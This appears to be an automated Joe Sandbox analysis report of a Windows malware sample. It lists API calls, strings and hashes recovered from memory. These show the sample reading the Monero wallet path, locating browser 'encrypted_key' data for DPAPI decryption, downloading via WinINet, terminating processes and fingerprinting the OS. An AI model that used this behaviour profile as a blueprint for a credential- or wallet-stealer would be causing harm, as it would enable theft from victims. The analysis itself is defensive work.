                              • Opcode ID: c9931c2140f1005326cf7f2ea10a14c431174fb0b0f7d38896fc96dc128ffd86
                              • Instruction ID: 6b3b2c36d10ae1148d039ed0b6e8b0e0068543bdd2da8da32f5b5a6832c7964c
                              • Opcode Fuzzy Hash: c9931c2140f1005326cf7f2ea10a14c431174fb0b0f7d38896fc96dc128ffd86
                              • Instruction Fuzzy Hash: 12713FB1D0421DEBDB14DF95CCC4ADEB7B9EF48300F10856AE509A7240EB35AE85CB91
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007B1135
                              • RtlAllocateHeap.NTDLL(00000000), ref: 007B113C
                              • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 007B1159
                              • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 007B1173
                              • RegCloseKey.ADVAPI32(?), ref: 007B117D
                              Strings
                              • SOFTWARE\monero-project\monero-core, xrefs: 007B114F
                              • wallet_path, xrefs: 007B116D
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                               • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                              • API String ID: 3225020163-4244082812
                              • Opcode ID: a8ed309871bcd8e095f1522ff61db43e918b490bff1e39aa4952a5a74f6330cf
                              • Instruction ID: de57bf5ae935215b23061c64b9979245a29b40b00e6f0be52429d9b0478f4128
                              • Opcode Fuzzy Hash: a8ed309871bcd8e095f1522ff61db43e918b490bff1e39aa4952a5a74f6330cf
                              • Instruction Fuzzy Hash: 6BF096B5640348BBD7109BE19C8EFEB7B7CEB04716F400054FE05E6280D6705D4497A0
                              APIs
                              • memcmp.MSVCRT(?,v20,00000003), ref: 007B9E04
                              • memcmp.MSVCRT(?,v10,00000003), ref: 007B9E42
                              • LocalAlloc.KERNEL32(00000040), ref: 007B9EA7
                                • Part of subcall function 007D71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 007D71FE
                              • lstrcpy.KERNEL32(00000000,007E4C48), ref: 007B9FB2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                               • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpymemcmp$AllocLocal
                              • String ID: @$v10$v20
                              • API String ID: 102826412-278772428
                              • Opcode ID: f877e1337748aab15e0be12ca0f150b133fc14fa25d7a7bed822a7e087d60d80
                              • Instruction ID: dfab5438aadce35d352b714cc4fdc20330f786282eda3dc504f7207cfb9be629
                              • Opcode Fuzzy Hash: f877e1337748aab15e0be12ca0f150b133fc14fa25d7a7bed822a7e087d60d80
                              • Instruction Fuzzy Hash: 9851BD71A11249EBDB10EF64DC89BEE77B4AF44324F154025FE19EB252DA78ED018B90
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 007B565A
                              • RtlAllocateHeap.NTDLL(00000000), ref: 007B5661
                              • InternetOpenA.WININET(007DCFEC,00000000,00000000,00000000,00000000), ref: 007B5677
                              • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 007B5692
                              • InternetReadFile.WININET(?,?,00000400,00000001), ref: 007B56BC
                              • memcpy.MSVCRT(00000000,?,00000001), ref: 007B56E1
                              • InternetCloseHandle.WININET(?), ref: 007B56FA
                              • InternetCloseHandle.WININET(00000000), ref: 007B5701
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                               • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                              • String ID:
                              • API String ID: 1008454911-0
                              • Opcode ID: 65cc75da61349bb401c4fcae62d3ad9d4a104329c1ea45d87fcfb269d2b3726a
                              • Instruction ID: 255dc7d0fd23a04eca30bcfdb7709044c2363521c171765bfc65095c2037b870
                              • Opcode Fuzzy Hash: 65cc75da61349bb401c4fcae62d3ad9d4a104329c1ea45d87fcfb269d2b3726a
                              • Instruction Fuzzy Hash: 6C419F70A00205EFDB24CF94DD88FEAB7B4FF48715F1480A9E9089B291E7759D42CB94
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 007D4759
                              • Process32First.KERNEL32(00000000,00000128), ref: 007D4769
                              • Process32Next.KERNEL32(00000000,00000128), ref: 007D477B
                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 007D479C
                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 007D47AB
                              • CloseHandle.KERNEL32(00000000), ref: 007D47B2
                              • Process32Next.KERNEL32(00000000,00000128), ref: 007D47C0
                              • CloseHandle.KERNEL32(00000000), ref: 007D47CB
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                               • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                              • String ID:
                              • API String ID: 3836391474-0
                              • Opcode ID: dbe6e569a29f3809d4e4ff0f87338bf767b6cb2d6abe9c9fca34c837e115df53
                              • Instruction ID: de72cb5e1843a39c5e71d2c886aa45af5504754e1a6fe1d7d0bbd2b45743bea5
                              • Opcode Fuzzy Hash: dbe6e569a29f3809d4e4ff0f87338bf767b6cb2d6abe9c9fca34c837e115df53
                              • Instruction Fuzzy Hash: BC01B571615214ABE7209B70DCC9FEA77BCEB48762F000581F909E9281EF748D809AA0
                              APIs
                              • lstrlen.KERNEL32(00000000), ref: 007C8435
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C846C
                              • lstrlen.KERNEL32(00000000), ref: 007C84B2
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C84E9
                              • lstrlen.KERNEL32(00000000), ref: 007C84FF
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C852E
                              • StrCmpCA.SHLWAPI(00000000,007E4C3C), ref: 007C853E
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                               • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: 7ddda848f57ce416d230258f7c4ea7883d79f35705bc909fdaf35a2c200a71ce
                              • Instruction ID: 508d08767e189a80fa445259c23f1546f7380196a0a82b030250843d2070749e
                              • Opcode Fuzzy Hash: 7ddda848f57ce416d230258f7c4ea7883d79f35705bc909fdaf35a2c200a71ce
                              • Instruction Fuzzy Hash: F5515C715002029FCB64DF68D888F9AB7B9EF44300B25845DEC45EB245EB78E9418B51
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 007D2925
                              • RtlAllocateHeap.NTDLL(00000000), ref: 007D292C
                              • RegOpenKeyExA.ADVAPI32(80000002,0144BD58,00000000,00020119,007D28A9), ref: 007D294B
                              • RegQueryValueExA.ADVAPI32(007D28A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 007D2965
                              • RegCloseKey.ADVAPI32(007D28A9), ref: 007D296F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                               • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: CurrentBuildNumber
                              • API String ID: 3225020163-1022791448
                              • Opcode ID: e261f4c2b5bd08a512678b2ea9232916b29f0d5e94b38cce18fe941502f669fd
                              • Instruction ID: 71f2f6ebc137b71d791b8607f0f4e93b46c19e4d3d58e2b330e4339485e0b38c
                              • Opcode Fuzzy Hash: e261f4c2b5bd08a512678b2ea9232916b29f0d5e94b38cce18fe941502f669fd
                              • Instruction Fuzzy Hash: 3E01B175604258ABD320CBA49C99FFB7BBCEB48716F100059FE49AB241EA315D058790
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 007D2895
                              • RtlAllocateHeap.NTDLL(00000000), ref: 007D289C
                                • Part of subcall function 007D2910: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 007D2925
                                • Part of subcall function 007D2910: RtlAllocateHeap.NTDLL(00000000), ref: 007D292C
                                • Part of subcall function 007D2910: RegOpenKeyExA.ADVAPI32(80000002,0144BD58,00000000,00020119,007D28A9), ref: 007D294B
                                • Part of subcall function 007D2910: RegQueryValueExA.ADVAPI32(007D28A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 007D2965
                                • Part of subcall function 007D2910: RegCloseKey.ADVAPI32(007D28A9), ref: 007D296F
                              • RegOpenKeyExA.ADVAPI32(80000002,0144BD58,00000000,00020119,007C9500), ref: 007D28D1
                              • RegQueryValueExA.ADVAPI32(007C9500,0145DA50,00000000,00000000,00000000,000000FF), ref: 007D28EC
                              • RegCloseKey.ADVAPI32(007C9500), ref: 007D28F6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                               • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: Windows 11
                              • API String ID: 3225020163-2517555085
                              • Opcode ID: 14767d02a9b16a5b8ecdedf96f711f62a142012751b2bea692ef99394d19a2b0
                              • Instruction ID: de5ba905acb2b69ff119e586611a229fc6e4fea5bc0c4369bd82b2f7438be17e
                              • Opcode Fuzzy Hash: 14767d02a9b16a5b8ecdedf96f711f62a142012751b2bea692ef99394d19a2b0
                              • Instruction Fuzzy Hash: AA018F71614248BBD710DBA4AC8DFAB777CEB44316F000555FE08DA291DA749D45A7A0
                              APIs
                              • LoadLibraryA.KERNEL32(?), ref: 007B723E
                              • GetProcessHeap.KERNEL32(00000008,00000010), ref: 007B7279
                              • RtlAllocateHeap.NTDLL(00000000), ref: 007B7280
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 007B72C3
                              • HeapFree.KERNEL32(00000000), ref: 007B72CA
                              • GetProcAddress.KERNEL32(00000000,?), ref: 007B7329
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                               • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                              • String ID:
                              • API String ID: 174687898-0
                              • Opcode ID: da5d068243e269d64b29aa0d8a81a1b027e1cce30ea6736c5bbf964e60d427ca
                              • Instruction ID: 22964c6b3ad31a17d6a657fc64ea881bf86ffa81969ba91fbe52d10521e9d3e7
                              • Opcode Fuzzy Hash: da5d068243e269d64b29aa0d8a81a1b027e1cce30ea6736c5bbf964e60d427ca
                              • Instruction Fuzzy Hash: 59414A71A056469BDB24CFA9DC84BEAB3F8FB89315F1445A9EC49CB340E635ED00DB50
                              APIs
                              • memset.MSVCRT ref: 007CD7D6
                              • RegOpenKeyExA.ADVAPI32(80000001,0145D360,00000000,00020119,?), ref: 007CD7F5
                              • RegQueryValueExA.ADVAPI32(?,0145DD20,00000000,00000000,00000000,000000FF), ref: 007CD819
                              • RegCloseKey.ADVAPI32(?), ref: 007CD823
                              • lstrcat.KERNEL32(?,00000000), ref: 007CD848
                              • lstrcat.KERNEL32(?,0145DC30), ref: 007CD85C
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                               • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$CloseOpenQueryValuememset
                              • String ID:
                              • API String ID: 2623679115-0
                              • Opcode ID: d48770d2664757d94e13dc6545471d165f5e5482742aac28b88f58c219217877
                              • Instruction ID: 0edffbe8dd9ab38623a05e8bf85de232599579029654fa9d47ce02255d882520
                              • Opcode Fuzzy Hash: d48770d2664757d94e13dc6545471d165f5e5482742aac28b88f58c219217877
                              • Instruction Fuzzy Hash: 97414371A2014CDBCB64EF64EC86FDE7778AF54304F408068B909A7251EE34AE558F91
                              APIs
                              • lstrcpy.KERNEL32(00000000), ref: 007B9CA8
                              • LocalAlloc.KERNEL32(00000040,?), ref: 007B9CDA
                              • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 007B9D03
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                               • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocLocallstrcpy
                              • String ID: $"encrypted_key":"$DPAPI
                              • API String ID: 2746078483-738592651
